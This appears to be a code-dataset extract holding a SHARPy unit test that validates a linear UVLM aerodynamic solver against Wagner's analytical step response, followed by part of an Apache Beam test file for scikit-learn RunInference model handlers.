data_gen=partial(generate_pre_ids), lod=lod_data),
"scores_data": TensorConfig(
data_gen=partial(generate_pre_score), lod=lod_data),
"scores_data2": TensorConfig(
data_gen=partial(generate_pre_score), lod=lod_data),
},
outputs=["sentence_ids_data", "sentence_scores_data"])
return program_config
|
e692c1d12af004b80fefc0e4ffd1172a60794675
|
26060f5ea4d7efee2d03cbbd0b49c099e0f5f38a
|
/tests/linear/uvlm/test_infinite_span.py
|
70a857e4cdfa90342a52668b553230b705ef137b
|
[
"BSD-3-Clause"
] |
permissive
|
ImperialCollegeLondon/sharpy
|
0fcd1fba9ed2181dabc1124f9800aa75521bfc3d
|
58ddceb985bef13af3ea199a1764c8dc9b088907
|
refs/heads/main
| 2023-08-19T03:04:26.044857
| 2023-07-17T07:05:06
| 2023-07-17T07:05:06
| 70,235,936
| 106
| 55
|
BSD-3-Clause
| 2023-08-16T02:27:58
| 2016-10-07T10:11:51
|
Python
|
UTF-8
|
Python
| false
| false
| 19,018
|
py
|
test_infinite_span.py
|
"""Linearised UVLM 2D tests
Test linear UVLM solver against analytical results for 2D wing
Author: S. Maraniello, Dec 2018
Modified: N. Goizueta, Sep 2019
"""
import unittest
import os
# import matplotlib.pyplot as plt
import numpy as np
import shutil
import sharpy.sharpy_main
import sharpy.utils.algebra as algebra
import sharpy.utils.analytical as an
import sharpy.linear.src.linuvlm as linuvlm
import sharpy.cases.templates.flying_wings as flying_wings
import sharpy.utils.sharpydir as sharpydir
import sharpy.utils.cout_utils as cout
class Test_infinite_span(unittest.TestCase):
"""
Test infinite-span flat wing at zero incidence against analytical solutions
"""
test_dir = sharpydir.SharpyDir + '/tests/linear/uvlm/'
def setUp_from_params(self, Nsurf, integr_ord, RemovePred, UseSparse, RollNodes):
"""
Builds SHARPy solution for a rolled infinite span flat wing at zero
incidence. Rolling can be obtained either by rotating the FoR A or
modifying the nodes of the wing.
"""
# Flags
self.ProducePlots = True
# Define Parametrisation
M, N, Mstar_fact = 8, 8, 50
# Flying properties
if RollNodes:
self.Roll0Deg = 0.
else:
self.Roll0Deg = 0.
self.Alpha0Deg = 0.0
Uinf0 = 50.
### ----- build directories
self.case_code = 'wagner'
self.case_main = self.case_code + \
'_r%.4daeff%.2d_rnodes%s_Nsurf%.2dM%.2dN%.2dwk%.2d' \
% (int(np.round(100 * self.Roll0Deg)),
int(np.round(100 * self.Alpha0Deg)),
RollNodes, Nsurf, M, N, Mstar_fact)
self.case_main += 'ord%.1d_rp%s_sp%s' % (integr_ord, RemovePred, UseSparse)
self.route_test_dir = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
route_main = self.route_test_dir + '/res/'
self.figfold = self.route_test_dir + '/figs/'
if os.path.exists(route_main):
shutil.rmtree(route_main)
if os.path.exists(self.figfold):
shutil.rmtree(self.figfold)
os.makedirs(route_main)
os.makedirs(self.figfold)
### ----- sharpy reference solution
# Build wing model
ws = flying_wings.QuasiInfinite(
M=M, N=N, Mstar_fact=Mstar_fact, n_surfaces=Nsurf,
u_inf=Uinf0, alpha=self.Alpha0Deg, roll=self.Roll0Deg,
aspect_ratio=1e5, RollNodes=RollNodes,
route=route_main, case_name=self.case_main)
ws.main_ea = .4
ws.clean_test_files()
ws.update_derived_params()
ws.generate_fem_file()
ws.generate_aero_file()
# solution flow
ws.set_default_config_dict()
ws.config['SHARPy']['flow'] = ['BeamLoader', 'AerogridLoader', 'StaticUvlm', 'BeamPlot', 'AerogridPlot']
ws.config['SHARPy']['log_folder'] = self.route_test_dir + '/output/' + self.case_code + '/'
ws.config['SHARPy']['write_screen'] = 'off'
ws.config['SHARPy']['write_log'] = 'off'
ws.config['LinearUvlm'] = {'dt': ws.dt,
'integr_order': integr_ord,
'density': ws.rho,
'remove_predictor': RemovePred,
'use_sparse': UseSparse,
'ScalingDict': {'length': 1.,
'speed': 1.,
'density': 1.},
'vortex_radius': 1e-6}
ws.config.write()
# solve at linearistion point
data0 = sharpy.sharpy_main.main(['...', route_main + self.case_main + '.sharpy'])
tsaero0 = data0.aero.timestep_info[0]
tsaero0.rho = ws.config['LinearUvlm']['density']
### ---- normalisation parameters
self.start_writer()
# verify chord
c_ext = np.linalg.norm(tsaero0.zeta[0][:, 0, 0] - tsaero0.zeta[0][:, -1, 0])
assert np.abs(ws.c_ref - c_ext) < 1e-8, 'Wrong reference chord'
# reference force - total
qinf = 0.5 * ws.rho * Uinf0 ** 2
span = Nsurf * np.linalg.norm(tsaero0.zeta[0][:, 0, 0] - tsaero0.zeta[0][:, 0, -1])
Stot = ws.c_ref * span
Fref_tot = qinf * Stot
# reference force - section
sec_span = np.linalg.norm(tsaero0.zeta[0][:, 0, 0] - tsaero0.zeta[0][:, 0, 1])
S = ws.c_ref * sec_span
Fref_span = qinf * S
# save
self.route_main = route_main
self.tsaero0 = tsaero0
self.ws = ws
self.Fref_tot = Fref_tot
self.Fref_span = Fref_span
self.M = M
self.N = N
self.Mstar_fact = Mstar_fact
self.Uinf0 = Uinf0
def test_wagner(self):
"""
Step response (Wagner):
- set linearisation point at 0 effective incidence but non-zero roll
attitude. This can be obtained either by rotating the FoR A or
by explicitly modifying the position of the wing nodes.
- perturb. state so as to produce a small effective angle of attack.
This is achieved combining changes of:
- wing lattice orientation
- wing lattice speed
- incoming flow orientation
- compare aerodynamic force time history to Wagner's analytical solution
- compare steady state to analytical solution and ``StaticUvlm`` solver
Notes:
The function uses ``subTest`` to call ``run_wagner`` for each parameter combination.
"""
for Nsurf in [1, 2]:
for integr_ord in [1, 2]:
for RemovePred in [False, True]:
for UseSparse in [True]:
for RollNodes in [True, False]:
with self.subTest(
Nsurf=Nsurf, integr_ord=integr_ord,
RemovePred=RemovePred, UseSparse=UseSparse,
RollNodes=RollNodes):
self.run_wagner(
Nsurf, integr_ord, RemovePred, UseSparse, RollNodes)
def run_wagner(self, Nsurf, integr_ord, RemovePred, UseSparse, RollNodes):
"""
see test_wagner
"""
### ----- set reference solution
self.setUp_from_params(Nsurf, integr_ord, RemovePred, UseSparse, RollNodes)
tsaero0 = self.tsaero0
ws = self.ws
M = self.M
N = self.N
Mstar_fact = self.Mstar_fact
Uinf0 = self.Uinf0
### ----- linearisation
uvlm = linuvlm.Dynamic(tsaero0,
dynamic_settings=ws.config['LinearUvlm'])
uvlm.assemble_ss()
zeta_pole = np.array([0., 0., 0.])
uvlm.get_total_forces_gain(zeta_pole=zeta_pole)
uvlm.get_rigid_motion_gains(zeta_rotation=zeta_pole)
uvlm.get_sect_forces_gain()
### ----- Scale gains
Fref_tot = self.Fref_tot
Fref_span = self.Fref_span
uvlm.Kftot = uvlm.Kftot / Fref_tot
uvlm.Kmtot = uvlm.Kmtot / Fref_tot / ws.c_ref
uvlm.Kfsec /= Fref_span
uvlm.Kmsec /= (Fref_span * ws.c_ref)
### ----- step input
# rotate incoming flow, wing lattice and wing lattice speed about
# the (rolled) wing elastic axis to create an effective angle of attack.
# Rotation is expressed through a CRV.
delta_AlphaEffDeg = 1e-2
delta_AlphaEffRad = 1e-2 * np.pi / 180.
Roll0Rad = self.Roll0Deg / 180. * np.pi
dcrv = -delta_AlphaEffRad * np.array([0., np.cos(Roll0Rad), np.sin(Roll0Rad)])
uvec0 = np.array([Uinf0, 0, 0])
uvec = np.dot(algebra.crv2rotation(dcrv), uvec0)
duvec = uvec - uvec0
dzeta = np.zeros((Nsurf, 3, M + 1, N // Nsurf + 1))
dzeta_dot = np.zeros((Nsurf, 3, M + 1, N // Nsurf + 1))
du_ext = np.zeros((Nsurf, 3, M + 1, N // Nsurf + 1))
for ss in range(Nsurf):
for mm in range(M + 1):
for nn in range(N // Nsurf + 1):
dzeta_dot[ss, :, mm, nn] = -1. / 3 * duvec
du_ext[ss, :, mm, nn] = +1. / 3 * duvec
dzeta = 1. / 3 * np.dot(uvlm.Krot, dcrv)
Uaero = np.concatenate((dzeta.reshape(-1),
dzeta_dot.reshape(-1),
du_ext.reshape(-1)))
### ----- Steady state solution
xste, yste = uvlm.solve_steady(Uaero)
Ftot_ste = np.dot(uvlm.Kftot, yste)
Mtot_ste = np.dot(uvlm.Kmtot, yste)
# first check of gain matrices...
Ftot_ste_ref = np.zeros((3,))
Mtot_ste_ref = np.zeros((3,))
fnodes = yste.reshape((Nsurf, 3, M + 1, N // Nsurf + 1))
for ss in range(Nsurf):
for nn in range(N // Nsurf + 1):
for mm in range(M + 1):
Ftot_ste_ref += fnodes[ss, :, mm, nn]
Mtot_ste_ref += np.cross(
uvlm.MS.Surfs[ss].zeta[:, mm, nn], fnodes[ss, :, mm, nn])
Ftot_ste_ref /= Fref_tot
Mtot_ste_ref /= (Fref_tot * ws.c_ref)
Fmag = np.linalg.norm(Ftot_ste_ref)
er_f = np.max(np.abs(Ftot_ste - Ftot_ste_ref)) / Fmag
er_m = np.max(np.abs(Mtot_ste - Mtot_ste_ref)) / Fmag / ws.c_ref
assert (er_f < 1e-8 and er_m < 1e-8), \
'Error of total forces (%.2e) and moment (%.2e) too large!' % (er_f, er_m) + \
'Verify gains produced by linuvlm.Dynamic.get_total_forces_gain.'
# then compare against analytical ...
Cl_inf = delta_AlphaEffRad * np.pi * 2.
Cfvec_inf = Cl_inf * np.array([0., -np.sin(Roll0Rad), np.cos(Roll0Rad)])
er_f = np.abs(np.linalg.norm(Ftot_ste) / Cl_inf - 1.)
assert (er_f < 1e-2), \
'Error of total lift coefficient (%.2e) too large!' % (er_f,) + \
'Verify linuvlm.Dynamic.'
er_f = np.abs(np.linalg.norm(Ftot_ste - Cfvec_inf) / Cl_inf)
assert (er_f < 1e-2), \
'Error of total aero force (%.2e) too large!' % (er_f,) + \
'Verify linuvlm.Dynamic.'
# ... and finally compare against non-linear UVLM
# ps: here we roll the wing and rotate the incoming flow to generate an effective
# angle of attack
case_pert = 'wagner_r%.4daeff%.2d_rnodes%s_Nsurf%.2dM%.2dN%.2dwk%.2d' \
% (int(np.round(100 * self.Roll0Deg)),
int(np.round(100 * delta_AlphaEffDeg)),
RollNodes,
Nsurf, M, N, Mstar_fact)
ws_pert = flying_wings.QuasiInfinite(
M=M, N=N, Mstar_fact=Mstar_fact, n_surfaces=Nsurf,
u_inf=Uinf0,
alpha=self.Alpha0Deg,
roll=self.Roll0Deg,
aspect_ratio=1e5,
route=self.route_main,
case_name=case_pert,
RollNodes=RollNodes)
ws_pert.u_inf_direction = uvec / Uinf0
ws_pert.main_ea = ws.main_ea
ws_pert.clean_test_files()
ws_pert.update_derived_params()
ws_pert.generate_fem_file()
ws_pert.generate_aero_file()
# solution flow
ws_pert.set_default_config_dict()
ws_pert.config['SHARPy']['flow'] = ws.config['SHARPy']['flow']
ws_pert.config['SHARPy']['write_screen'] = 'off'
ws_pert.config['SHARPy']['write_log'] = 'off'
ws_pert.config['SHARPy']['log_folder'] = self.route_test_dir + '/output/' + self.case_code + '/'
ws_pert.config.write()
# solve at perturbed point
data_pert = sharpy.sharpy_main.main(['...', self.route_main + case_pert + '.sharpy'])
tsaero = data_pert.aero.timestep_info[0]
self.start_writer()
# get total forces
Ftot_ste_pert = np.zeros((3,))
Mtot_ste_pert = np.zeros((3,))
for ss in range(Nsurf):
for nn in range(N // Nsurf + 1):
for mm in range(M + 1):
Ftot_ste_pert += tsaero.forces[ss][:3, mm, nn]
Mtot_ste_pert += np.cross(
uvlm.MS.Surfs[ss].zeta[:, mm, nn], tsaero.forces[ss][:3, mm, nn])
Ftot_ste_pert /= Fref_tot
Mtot_ste_pert /= (Fref_tot * ws.c_ref)
Fmag = np.linalg.norm(Ftot_ste_pert)
er_f = np.max(np.abs(Ftot_ste - Ftot_ste_pert)) / Fmag
er_m = np.max(np.abs(Mtot_ste - Mtot_ste_pert)) / Fmag / ws.c_ref
assert (er_f < 2e-4 and er_m < 2e-4), \
'Error of total forces (%.2e) and moment (%.2e) ' % (er_f, er_m) + \
'with respect to geometrically-exact UVLM too large!'
# and check non-linear uvlm against analytical solution
er_f = np.abs(np.linalg.norm(Ftot_ste_pert - Cfvec_inf) / Cl_inf)
assert (er_f <= 1.5e-2), \
'Error of total aero force components (%.2e) too large!' % (er_f,) + \
'Verify StaticUvlm'
### ----- Analytical step response (Wagner solution)
NT = 251
tv = np.linspace(0., uvlm.dt * (NT - 1), NT)
Clv_an = an.wagner_imp_start(delta_AlphaEffRad, Uinf0, ws.c_ref, tv)
assert np.abs(Clv_an[-1] / Cl_inf - 1.) < 1e-2, \
'Did someone modify this test case?! The time should be enough to reach ' \
'the steady-state CL with a 1 perc. tolerance...'
Cfvec_an = np.zeros((NT, 3))
Cfvec_an[:, 1] = -np.sin(Roll0Rad) * Clv_an
Cfvec_an[:, 2] = np.cos(Roll0Rad) * Clv_an
### ----- Dynamic step response
Fsect = np.zeros((NT, Nsurf, 3, N // Nsurf + 1))
# Fbeam=np.zeros((NT,6,N//Nsurf+1))
Ftot = np.zeros((NT, 3))
Er_f_tot = np.zeros((NT,))
# Ybeam=[]
gamma = np.zeros((NT, Nsurf, M, N // Nsurf))
gamma_dot = np.zeros((NT, Nsurf, M, N // Nsurf))
gamma_star = np.zeros((NT, Nsurf, int(M * Mstar_fact), N // Nsurf))
xold = np.zeros((uvlm.SS.A.shape[0],))
for tt in range(1, NT):
xnew, ynew = uvlm.solve_step(xold, Uaero)
change = np.linalg.norm(xnew - xold)
xold = xnew
# record state ?
if uvlm.remove_predictor is False:
gv, gvstar, gvdot = uvlm.unpack_state(xnew)
gamma[tt, :, :, :] = gv.reshape((Nsurf, M, N // Nsurf))
gamma_dot[tt, :, :, :] = gvdot.reshape((Nsurf, M, N // Nsurf))
gamma_star[tt, :, :, :] = gvstar.reshape((Nsurf, int(M * Mstar_fact), N // Nsurf))
# calculate forces (and error)
Ftot[tt, :3] = np.dot(uvlm.Kftot, ynew)
Er_f_tot[tt] = np.linalg.norm(Ftot[tt, :] - Cfvec_an[tt, :]) / Clv_an[tt]
Fsect[tt, :, :, :] = np.dot(uvlm.Kfsec, ynew).reshape((Nsurf, 3, N // Nsurf + 1))
# ### beam forces
# Ybeam.append(np.dot(Sol.Kforces[:-10,:],ynew))
# Fdummy=Ybeam[-1].reshape((N//Nsurf,6)).T
# Fbeam[tt,:,:N//Nsurf]=Fdummy[:,:N//Nsurf]
# Fbeam[tt,:,N//Nsurf+1:]=Fdummy[:,N//Nsurf:]
if RemovePred:
ts2perc, ts1perc = 6, 6
else:
ts2perc, ts1perc = 16, 36
er_th_2perc = np.max(Er_f_tot[ts2perc:])
er_th_1perc = np.max(Er_f_tot[ts1perc:])
### ----- generate plot
if self.ProducePlots:
# sections to plot
if Nsurf == 1:
Nplot = [0, N // 2, N]
labs = [r'tip', r'root', r'tip']
elif Nsurf == 2:
Nplot = [0, N // 2 - 1]
labs = [r'tip', r'near root', r'tip', r'near root']
axtitle = [r'$C_{F_y}$', r'$C_{F_z}$']
# non-dimensional time
sv = 2.0 * Uinf0 * tv / ws.c_ref
# generate figure
clist = ['#003366', '#CC3333', '#336633', '#FF6600'] * 4
fontlabel = 12
std_params = {'legend.fontsize': 10,
'font.size': fontlabel,
'xtick.labelsize': fontlabel - 2,
'ytick.labelsize': fontlabel - 2,
'figure.autolayout': True,
'legend.numpoints': 1}
# plt.rcParams.update(std_params)
# fig = plt.figure('Lift time-history', (12, 6))
# axvec = fig.subplots(1, 2)
# for aa in [0, 1]:
# comp = aa + 1
# axvec[aa].set_title(axtitle[aa])
# axvec[aa].plot(sv, Cfvec_an[:, comp] / Cl_inf, lw=4, ls='-',
# alpha=0.5, color='r', label=r'Wagner')
# axvec[aa].plot(sv, Ftot[:, comp] / Cl_inf, lw=5, ls=':',
# alpha=0.7, color='k', label=r'Total')
# cc = 0
# for ss in range(Nsurf):
# for nn in Nplot:
# axvec[aa].plot(sv, Fsect[:, ss, comp, nn] / Cl_inf,
# lw=4 - cc, ls='--', alpha=0.7, color=clist[cc],
# label=r'Surf. %.1d, n=%.2d (%s)' % (ss, nn, labs[cc]))
# cc += 1
# axvec[aa].grid(color='0.8', ls='-')
# axvec[aa].grid(color='0.85', ls='-', which='minor')
# axvec[aa].set_xlabel(r'normalised time $t=2 U_\infty \tilde{t}/c$')
# axvec[aa].set_ylabel(axtitle[aa] + r'$/C_{l_\infty}$')
# axvec[aa].set_xlim(0, sv[-1])
# if Cfvec_inf[comp] > 0.:
# axvec[aa].set_ylim(0, 1.1)
# else:
# axvec[aa].set_ylim(-1.1, 0)
# plt.legend(ncol=1)
# # plt.show()
# fig.savefig(self.figfold + self.case_main + '.png')
# fig.savefig(self.figfold + self.case_main + '.pdf')
# plt.close()
assert er_th_2perc < 2e-2 and er_th_1perc < 1e-2, \
'Error of dynamic step response at time-steps 16 and 36 ' + \
'(%.2e and %.2e) too large. Verify Linear UVLM.' % (er_th_2perc, er_th_1perc)
def start_writer(self):
# Overwrite the writer with print_file False to avoid I/O errors
global cout_wrap
cout_wrap = cout.Writer()
# cout_wrap.initialise(print_screen=False, print_file=False)
cout_wrap.cout_quiet()
sharpy.utils.cout_utils.cout_wrap = cout_wrap
def tearDown(self):
cout.finish_writer()
try:
shutil.rmtree(self.route_test_dir + '/res/')
shutil.rmtree(self.route_test_dir + '/figs/')
shutil.rmtree(self.route_test_dir + '/output/')
except FileNotFoundError:
pass
if __name__ == '__main__':
if os.path.exists('./figs/infinite_span'):
shutil.rmtree('./figs/infinite_span')
unittest.main()
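A minimal standalone sketch of the analytical reference the assertions above compare against, assuming only the ``an.wagner_imp_start(alpha_rad, u_inf, chord, time_vector)`` call signature already used in ``run_wagner``; the flow parameters below are placeholders rather than values taken from the test:

    import numpy as np
    import sharpy.utils.analytical as an

    alpha_rad = 1e-2 * np.pi / 180.    # small step in effective incidence
    u_inf, chord, dt = 50., 1., 1e-3   # placeholder speed, chord and time step
    tv = np.linspace(0., 250 * dt, 251)
    cl_t = an.wagner_imp_start(alpha_rad, u_inf, chord, tv)  # Wagner CL history
    cl_inf = 2. * np.pi * alpha_rad    # steady thin-aerofoil lift coefficient
    print(cl_t[-1] / cl_inf)           # tends towards 1 as the response settles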
|
39ddee3b218539e6e0049166a214662e57072908
|
d1c2d00078520cd556f60b7213c27856f8b3460d
|
/sdks/python/apache_beam/ml/inference/sklearn_inference_test.py
|
c2ea9fa1e95597dd6992c748a31c29b9a72757d1
|
[
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-protobuf",
"Apache-2.0",
"Python-2.0"
] |
permissive
|
apache/beam
|
ed11b9e043465c720659eac20ac71b5b171bfa88
|
6d5048e05087ea54abc889ce402ae2a0abb9252b
|
refs/heads/master
| 2023-09-04T07:41:07.002653
| 2023-09-01T23:01:05
| 2023-09-01T23:01:05
| 50,904,245
| 7,061
| 4,522
|
Apache-2.0
| 2023-09-14T21:43:38
| 2016-02-02T08:00:06
|
Java
|
UTF-8
|
Python
| false
| false
| 23,120
|
py
|
sklearn_inference_test.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
import io
import math
import os
import pickle
import platform
import shutil
import sys
import tempfile
import unittest
from typing import Any
from typing import Dict
from typing import Optional
from typing import Sequence
import joblib
import numpy
import pandas
from sklearn import linear_model
from sklearn import svm
from sklearn.base import BaseEstimator
from sklearn.compose import ColumnTransformer
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import OneHotEncoder
from sklearn.preprocessing import StandardScaler
import apache_beam as beam
from apache_beam.ml.inference.base import KeyedModelHandler
from apache_beam.ml.inference.base import PredictionResult
from apache_beam.ml.inference.base import RunInference
from apache_beam.ml.inference.sklearn_inference import ModelFileType
from apache_beam.ml.inference.sklearn_inference import SklearnModelHandlerNumpy
from apache_beam.ml.inference.sklearn_inference import SklearnModelHandlerPandas
from apache_beam.ml.inference.sklearn_inference import _default_numpy_inference_fn
from apache_beam.ml.inference.sklearn_inference import _default_pandas_inference_fn
from apache_beam.testing.test_pipeline import TestPipeline
from apache_beam.testing.util import assert_that
from apache_beam.testing.util import equal_to
def _compare_prediction_result(a, b):
example_equal = numpy.array_equal(a.example, b.example)
if isinstance(a.inference, dict):
return all(
x == y for x, y in zip(a.inference.values(),
b.inference.values())) and example_equal
return a.inference == b.inference and example_equal
def _compare_dataframe_predictions(a_in, b_in):
keys_equal = True
if isinstance(a_in, tuple) and not isinstance(a_in, PredictionResult):
a_key, a = a_in
b_key, b = b_in
keys_equal = a_key == b_key
else:
a = a_in
b = b_in
example_equal = pandas.DataFrame.equals(a.example, b.example)
if isinstance(a.inference, dict):
return all(
math.floor(a) == math.floor(b) for a,
b in zip(a.inference.values(), b.inference.values())) and example_equal
inference_equal = math.floor(a.inference) == math.floor(b.inference)
return inference_equal and example_equal and keys_equal
class FakeModel:
def __init__(self):
self.total_predict_calls = 0
def predict(self, input_vector: numpy.ndarray):
self.total_predict_calls += 1
return numpy.sum(input_vector, axis=1)
class FakeNumpyModelDictOut:
def __init__(self):
self.total_predict_calls = 0
def predict(self, input_vector: numpy.ndarray):
self.total_predict_calls += 1
out = numpy.sum(input_vector, axis=1)
return {"out1": out, "out2": out}
class FakePandasModelDictOut:
def __init__(self):
self.total_predict_calls = 0
def predict(self, df: pandas.DataFrame):
self.total_predict_calls += 1
out = df.loc[:, 'number_2']
return {"out1": out, "out2": out}
def build_model():
x = [[0, 0], [1, 1]]
y = [0, 1]
model = svm.SVC()
model.fit(x, y)
return model
def pandas_dataframe():
csv_string = (
'category_1,number_1,category_2,number_2,label,number_3\n'
'red,4,frog,5,6,7\n'
'blue,3,horse,8,9,10\n'
'red,0,cow,1,2,3\n'
'blue,4,frog,1,1,1\n'
'red,1,horse,4,2,3')
csv_string_io = io.StringIO(csv_string)
return pandas.read_csv(csv_string_io)
def build_pandas_pipeline():
"""Builds a common type of pandas pipeline with preprocessing."""
categorical_columns = ['category_1', 'category_2']
numerical_columns = ['number_1', 'number_2', 'number_3']
categorical_transformer = OneHotEncoder(handle_unknown='ignore')
numerical_transformer = StandardScaler()
preprocessor = ColumnTransformer(
transformers=[
("numerical", numerical_transformer, numerical_columns),
("categorical", categorical_transformer, categorical_columns),
])
pipeline = Pipeline(
steps=[("preprocessor",
preprocessor), ("classifier", linear_model.SGDRegressor())])
data = pandas_dataframe()
labels = data['label']
pipeline.fit(data, labels)
return pipeline
def convert_inference_to_floor(prediction_result):
return math.floor(prediction_result.inference)
def alternate_numpy_inference_fn(
model: BaseEstimator,
batch: Sequence[numpy.ndarray],
inference_args: Optional[Dict[str, Any]] = None) -> Any:
return [0]
def alternate_pandas_inference_fn(
model: BaseEstimator,
batch: Sequence[pandas.DataFrame],
inference_args: Optional[Dict[str, Any]] = None) -> Any:
# vectorize data for better performance
vectorized_batch = pandas.concat(batch, axis=0)
predictions = model.predict(vectorized_batch)
splits = [
vectorized_batch.iloc[[i]] for i in range(vectorized_batch.shape[0])
]
predictions = predictions - 1
return predictions, splits
class SkLearnRunInferenceTest(unittest.TestCase):
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.tmpdir)
def test_predict_output(self):
fake_model = FakeModel()
inference_runner = SklearnModelHandlerNumpy(model_uri='unused')
batched_examples = [
numpy.array([1, 2, 3]), numpy.array([4, 5, 6]), numpy.array([7, 8, 9])
]
expected_predictions = [
PredictionResult(numpy.array([1, 2, 3]), 6),
PredictionResult(numpy.array([4, 5, 6]), 15),
PredictionResult(numpy.array([7, 8, 9]), 24)
]
inferences = inference_runner.run_inference(batched_examples, fake_model)
for actual, expected in zip(inferences, expected_predictions):
self.assertTrue(_compare_prediction_result(actual, expected))
def test_custom_inference_fn(self):
fake_model = FakeModel()
inference_runner = SklearnModelHandlerNumpy(
model_uri='unused', inference_fn=alternate_numpy_inference_fn)
batched_examples = [
numpy.array([1, 2, 3]), numpy.array([4, 5, 6]), numpy.array([7, 8, 9])
]
expected_predictions = [
PredictionResult(numpy.array([1, 2, 3]), 0),
PredictionResult(numpy.array([4, 5, 6]), 0),
PredictionResult(numpy.array([7, 8, 9]), 0)
]
inferences = inference_runner.run_inference(batched_examples, fake_model)
for actual, expected in zip(inferences, expected_predictions):
self.assertTrue(_compare_prediction_result(actual, expected))
def test_predict_output_dict(self):
fake_model = FakeNumpyModelDictOut()
inference_runner = SklearnModelHandlerNumpy(model_uri='unused')
batched_examples = [
numpy.array([1, 2, 3]), numpy.array([4, 5, 6]), numpy.array([7, 8, 9])
]
expected_predictions = [
PredictionResult(numpy.array([1, 2, 3]), {
"out1": 6, "out2": 6
}),
PredictionResult(numpy.array([4, 5, 6]), {
"out1": 15, "out2": 15
}),
PredictionResult(numpy.array([7, 8, 9]), {
"out1": 24, "out2": 24
})
]
inferences = inference_runner.run_inference(batched_examples, fake_model)
for actual, expected in zip(inferences, expected_predictions):
self.assertTrue(_compare_prediction_result(actual, expected))
def test_data_vectorized(self):
fake_model = FakeModel()
inference_runner = SklearnModelHandlerNumpy(model_uri='unused')
batched_examples = [
numpy.array([1, 2, 3]), numpy.array([4, 5, 6]), numpy.array([7, 8, 9])
]
# even though there are 3 examples, the data should
# be vectorized and only 1 call should happen.
inference_runner.run_inference(batched_examples, fake_model)
self.assertEqual(1, fake_model.total_predict_calls)
def test_num_bytes_numpy(self):
inference_runner = SklearnModelHandlerNumpy(model_uri='unused')
batched_examples_int = [
numpy.array([1, 2, 3]), numpy.array([4, 5, 6]), numpy.array([7, 8, 9])
]
self.assertEqual(
sys.getsizeof(batched_examples_int[0]) * 3,
inference_runner.get_num_bytes(batched_examples_int))
batched_examples_float = [
numpy.array([1.0, 2.0, 3.0]),
numpy.array([4.1, 5.2, 6.3]),
numpy.array([7.7, 8.8, 9.9])
]
self.assertEqual(
sys.getsizeof(batched_examples_float[0]) * 3,
inference_runner.get_num_bytes(batched_examples_float))
def test_pipeline_pickled(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(build_model(), file)
with TestPipeline() as pipeline:
examples = [numpy.array([0, 0]), numpy.array([1, 1])]
pcoll = pipeline | 'start' >> beam.Create(examples)
actual = pcoll | RunInference(
SklearnModelHandlerNumpy(model_uri=temp_file_name))
expected = [
PredictionResult(numpy.array([0, 0]), 0),
PredictionResult(numpy.array([1, 1]), 1)
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_prediction_result))
def test_pipeline_pickled_custom_batching(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(build_model(), file)
def batch_validator_numpy_inference_fn(
model: BaseEstimator,
batch: Sequence[numpy.ndarray],
inference_args: Optional[Dict[str, Any]] = None) -> Any:
if len(batch) != 2:
raise Exception(
f'Expected batch of size 2, received batch of size {len(batch)}')
return _default_numpy_inference_fn(model, batch, inference_args)
with TestPipeline() as pipeline:
examples = [numpy.array([0, 0]), numpy.array([1, 1])]
pcoll = pipeline | 'start' >> beam.Create(examples)
actual = pcoll | RunInference(
SklearnModelHandlerNumpy(
model_uri=temp_file_name,
inference_fn=batch_validator_numpy_inference_fn,
min_batch_size=2,
max_batch_size=2))
expected = [
PredictionResult(numpy.array([0, 0]), 0),
PredictionResult(numpy.array([1, 1]), 1)
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_prediction_result))
def test_pipeline_pickled_large_model(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(build_model(), file)
def large_model_validator_numpy_inference_fn(
model: BaseEstimator,
batch: Sequence[numpy.ndarray],
inference_args: Optional[Dict[str, Any]] = None) -> Any:
multi_process_shared_loaded = "multi_process_shared" in str(type(model))
if not multi_process_shared_loaded:
raise Exception(
f'Loaded model of type {type(model)}, was ' +
'expecting multi_process_shared_model')
return _default_numpy_inference_fn(model, batch, inference_args)
with TestPipeline() as pipeline:
examples = [numpy.array([0, 0]), numpy.array([1, 1])]
pcoll = pipeline | 'start' >> beam.Create(examples)
actual = pcoll | RunInference(
SklearnModelHandlerNumpy(
model_uri=temp_file_name,
inference_fn=large_model_validator_numpy_inference_fn,
large_model=True))
expected = [
PredictionResult(numpy.array([0, 0]), 0),
PredictionResult(numpy.array([1, 1]), 1)
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_prediction_result))
def test_pipeline_joblib(self):
temp_file_name = self.tmpdir + os.sep + 'joblib_file'
with open(temp_file_name, 'wb') as file:
joblib.dump(build_model(), file)
with TestPipeline() as pipeline:
examples = [numpy.array([0, 0]), numpy.array([1, 1])]
pcoll = pipeline | 'start' >> beam.Create(examples)
actual = pcoll | RunInference(
SklearnModelHandlerNumpy(
model_uri=temp_file_name, model_file_type=ModelFileType.JOBLIB))
expected = [
PredictionResult(numpy.array([0, 0]), 0),
PredictionResult(numpy.array([1, 1]), 1)
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_prediction_result))
def test_bad_file_raises(self):
with self.assertRaises(RuntimeError):
with TestPipeline() as pipeline:
examples = [numpy.array([0, 0])]
pcoll = pipeline | 'start' >> beam.Create(examples)
_ = pcoll | RunInference(
SklearnModelHandlerNumpy(model_uri='/var/bad_file_name'))
pipeline.run()
def test_bad_input_type_raises(self):
with self.assertRaisesRegex(AssertionError,
'Unsupported serialization type'):
with tempfile.NamedTemporaryFile(delete=False) as file:
model_handler = SklearnModelHandlerNumpy(
model_uri=file.name, model_file_type=None)
model_handler.load_model()
